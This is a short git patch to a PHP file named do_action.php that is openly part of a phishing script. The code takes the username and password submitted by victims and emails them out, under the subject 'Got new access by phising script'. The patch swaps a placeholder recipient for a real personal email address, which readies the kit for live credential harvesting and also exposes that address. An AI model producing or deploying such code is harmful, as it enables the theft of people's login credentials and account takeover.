From bc9a27923e6e3385721540e088ae01437e4b18f3 Mon Sep 17 00:00:00 2001 From: 3kafian <90708414+3kafian@users.noreply.github.com> Date: Tue, 14 Sep 2021 23:17:55 +0800 Subject: [PATCH] Update do_action.php --- do_action.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/do_action.php b/do_action.php index 25fa71a..a71ac7f 100644 --- a/do_action.php +++ b/do_action.php @@ -8,7 +8,7 @@ function mail_sender(){ $username = $_REQUEST['username']; $password = $_REQUEST['password']; - $reciever = "YOUR-EMAIL ADRRESS"; + $reciever = "albertcaagbay2@gmail.com"; $subject = "Got new access by phising script"; $message = "The username is ". $username;